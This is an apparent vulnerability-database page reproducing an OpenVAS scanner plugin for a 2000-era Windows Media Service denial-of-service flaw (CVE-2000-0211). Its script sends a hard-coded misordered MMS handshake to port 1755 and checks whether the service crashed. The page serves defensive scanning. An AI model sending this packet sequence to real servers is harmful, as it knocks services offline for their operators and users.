Lucene search
HistoryJul 30, 2012 - 12:00 a.m.
Microsoft Windows Media Service Handshake Sequence DoS Vulnerability

2012-07-3000:00:00
plugins.openvas.org
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
AI Score
6.6
Confidence
High
EPSS
0.084
Percentile
94.4%
JSON
Microsoft Windows Media Service is prone to a denial of service (DoS) vulnerability.
# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.802888");
  script_version("2023-07-21T05:05:22+0000");
  script_cve_id("CVE-2000-0211");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2012-07-30 13:22:23 +0530 (Mon, 30 Jul 2012)");
  script_name("Microsoft Windows Media Service Handshake Sequence DoS Vulnerability");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_family("Windows : Microsoft Bulletins");
  script_dependencies("find_service.nasl", "os_detection.nasl");
  script_require_ports(1755);
  script_mandatory_keys("Host/runs_windows");

  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/4034");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/1000");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/19759");
  script_xref(name:"URL", value:"https://web.archive.org/web/20121022223439/http://technet.microsoft.com/en-us/security/bulletin/fq00-013");
  script_xref(name:"URL", value:"http://support.microsoft.com/default.aspx?scid=kb;[LN];253943");
  script_xref(name:"URL", value:"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-013");

  script_tag(name:"impact", value:"Successful exploitation could allow remote attackers to cause denial of
  service conditions.");

  script_tag(name:"affected", value:"- Microsoft Windows 2000

  - Microsoft Windows NT 4.0

  - Microsoft Windows Media Services 4.0 and 4.1");

  script_tag(name:"insight", value:"The handshake sequence between a Windows Media server and a Windows Media
  Player occurs in a particular order. If a series of client handshake packets
  are sent in a particular misordered sequence, with certain timing
  constraints, the server attempts to use a resource before it has been
  initialized causing the Windows Media Unicast Service to crash.");

  script_tag(name:"solution", value:"The vendor has released updates. Please see the references for more information.");

  script_tag(name:"summary", value:"Microsoft Windows Media Service is prone to a denial of service (DoS) vulnerability.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

include("host_details.inc");

## Media Service Port
port = 1755;

if(!get_port_state(port)){
  exit(0);
}

soc1 = open_sock_tcp(port);
if(!soc1){
  exit(0);
}

mss_req1 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0,           ## Command Signature
                      0xa0, 0x00, 0x00, 0x00,                                   ## Command Length
                      0x4d, 0x4d, 0x53, 0x20,                                   ## Protocol Type : MMS (Microsoft Media Server)
                      0x14, 0x00, 0x00, 0x00,                                   ## Length until end
                      0x00, 0x00, 0x00, 0x00,                                   ## Sequence number
                      0xf8, 0x53, 0xe3, 0xa5, 0x9b, 0xc4, 0x00, 0x40,           ## Time Stamp
                      0x12, 0x00, 0x00, 0x00,                                   ## Length until end
                      0x01, 0x00,                                               ## Cmd : Connect Info (0x0001)
                      0x03, 0x00,                                               ## Cmd Direction : to Server (0x0003)
                      0xf0, 0xf0, 0xf0, 0xf0,                                   ## Prefix 1
                      0x0b, 0x00, 0x04, 0x00,                                   ## Prefix 2
                      0x1c, 0x00, 0x03, 0x00, 0x4e, 0x00, 0x53, 0x00, 0x50,     ## Player Info
                      0x00, 0x6c, 0x00, 0x61, 0x00, 0x79, 0x00, 0x65, 0x00,
                      0x72, 0x00, 0x2f, 0x00, 0x34, 0x00, 0x2e, 0x00, 0x31,
                      0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x33, 0x00,
                      0x38, 0x00, 0x35, 0x00, 0x37, 0x00, 0x3b, 0x00, 0x20,
                      0x00, 0x7b, 0x00, 0x30, 0x00, 0x32, 0x00, 0x64, 0x00,
                      0x30, 0x00, 0x63, 0x00, 0x32, 0x00, 0x63, 0x00, 0x30,
                      0x00, 0x2d, 0x00, 0x62, 0x00, 0x35, 0x00, 0x30, 0x00,
                      0x37, 0x00, 0x2d, 0x00, 0x31, 0x00, 0x31, 0x00, 0x64,
                      0x00, 0x32, 0x00, 0x2d, 0x00, 0x39, 0x00, 0x61, 0x00,
                      0x61, 0x00, 0x38, 0x00, 0x2d, 0x00, 0x62, 0x00, 0x37,
                      0x00, 0x30, 0x00, 0x66, 0x00, 0x33, 0x00, 0x30, 0x00,
                      0x34, 0x00, 0x34, 0x00, 0x61, 0x00, 0x65, 0x00, 0x37,
                      0x00, 0x65, 0x00, 0x7d, 0x00, 0x00, 0x00, 0x00, 0x00,
                      0x00, 0x00);

send(socket:soc1 , data: mss_req1);
mms_res = recv(socket:soc1, length:512);

if(!mms_res || "MMS" >!< mms_res)
{
  close(soc1);
  exit(0);
}

## Microsoft Media Service Transfer Request to Server
mss_req2 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x20,
                      0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x04, 0x00,
                      0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x5e, 0xba, 0x49,
                      0x0c, 0x02, 0x2b, 0x01, 0x40, 0x02, 0x00, 0x00, 0x00,
                      0x18, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0x0b,
                      0x00, 0x04, 0x00);

mss_req3 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x60,
                      0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x0c, 0x00,
                      0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x83, 0xc0, 0xca,
                      0xa1, 0x45, 0xb6, 0x01, 0x40, 0x0a, 0x00, 0x00, 0x00,
                      0x02, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0xff,
                      0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                      0xa0, 0x00, 0x02, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x5c,
                      0x00, 0x31, 0x00, 0x39, 0x00, 0x32, 0x00, 0x2e, 0x00,
                      0x31, 0x00, 0x36, 0x00, 0x38, 0x00, 0x2e, 0x00, 0x30,
                      0x00, 0x2e, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x54, 0x00,
                      0x43, 0x00, 0x50, 0x00, 0x5c, 0x00, 0x31, 0x00, 0x31,
                      0x00, 0x31, 0x00, 0x31, 0x00, 0x00, 0x00, 0x32, 0x00,
                      0x63, 0x00, 0x30, 0x00);

mss_req4 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x88,
                      0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x11, 0x00,
                      0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x2b, 0x87, 0x16,
                      0xd9, 0xce, 0xf7, 0x01, 0x40, 0x0f, 0x00, 0x00, 0x00,
                      0x05, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff,
                      0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                      0x00, 0x00, 0x54, 0x00, 0x68, 0x00, 0x65, 0x00, 0x20,
                      0x00, 0x45, 0x00, 0x61, 0x00, 0x67, 0x00, 0x6c, 0x00,
                      0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x54, 0x00, 0x65,
                      0x00, 0x71, 0x00, 0x75, 0x00, 0x69, 0x00, 0x6c, 0x00,
                      0x61, 0x00, 0x20, 0x00, 0x53, 0x00, 0x75, 0x00, 0x6e,
                      0x00, 0x72, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00,
                      0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x6b, 0x00, 0x2f,
                      0x00, 0x65, 0x00, 0x61, 0x00, 0x67, 0x00, 0x6c, 0x00,
                      0x65, 0x00, 0x73, 0x00, 0x32, 0x00, 0x38, 0x00, 0x2e,
                      0x00, 0x61, 0x00, 0x73, 0x00, 0x66, 0x00, 0x00, 0x00,
                      0x62, 0x00, 0x37, 0x00, 0x30, 0x00, 0x66, 0x00);

mss_req5 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x48,
                      0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x09, 0x00,
                      0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x67, 0x66, 0x66,
                      0x66, 0x66, 0x66, 0x02, 0x40, 0x07, 0x00, 0x00, 0x00,
                      0x15, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
                      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80,
                      0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x65, 0x00, 0x20,
                      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                      0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0xac, 0x40, 0x02,
                      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);

mss_req6 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x30,
                      0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x06, 0x00,
                      0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0a, 0xd7, 0xa3,
                      0x70, 0x3d, 0x0a, 0x11, 0x40, 0x04, 0x00, 0x00, 0x00,
                      0x33, 0x00, 0x03, 0x00, 0x02, 0x00, 0x00, 0x00, 0xff,
                      0xff, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0x02, 0x00,
                      0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x65, 0x00, 0x20,
                      0x00);

mss_req7 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x38,
                      0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x07, 0x00,
                      0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x2f, 0xdd, 0x24,
                      0x06, 0x81, 0x15, 0x11, 0x40, 0x05, 0x00, 0x00, 0x00,
                      0x07, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff,
                      0xff, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                      0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
                      0xff, 0x16, 0xca, 0x03, 0x80, 0x04, 0x00, 0x00, 0x00);

## Send the Misordered Handshake Sequence
send(socket:soc1 , data: mss_req2);
send(socket:soc1 , data: mss_req3);
send(socket:soc1 , data: mss_req4);
send(socket:soc1 , data: mss_req5);
send(socket:soc1 , data: mss_req6);
send(socket:soc1 , data: mss_req7);
res = recv(socket:soc1, length:1024);

sleep(7);
close(soc1);

soc2 = open_sock_tcp(port);

## If couldn't open soc then mms is crashed
if(!soc2)
{
  security_message(port);
  exit(0);
}
else
{
  ## Send the Connect request again
  send(socket:soc2 , data: mss_req1);
  mms_res = recv(socket:soc2, length:512);
  close(soc2);

  if(!mms_res || "MMS" >!< mms_res){
    security_message(port);
  }
}
References

support.microsoft.com/default.aspx?scid=kb;[LN];253943
www.exploit-db.com/exploits/19759
www.securityfocus.com/bid/1000
xforce.iss.net/xforce/xfdb/4034
docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-013
web.archive.org/web/20121022223439/technet.microsoft.com/en-us/security/bulletin/fq00-013
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
AI Score
6.6
Confidence
High
EPSS
0.084
Percentile
94.4%
JSON
Related for OPENVAS:1361412562310802888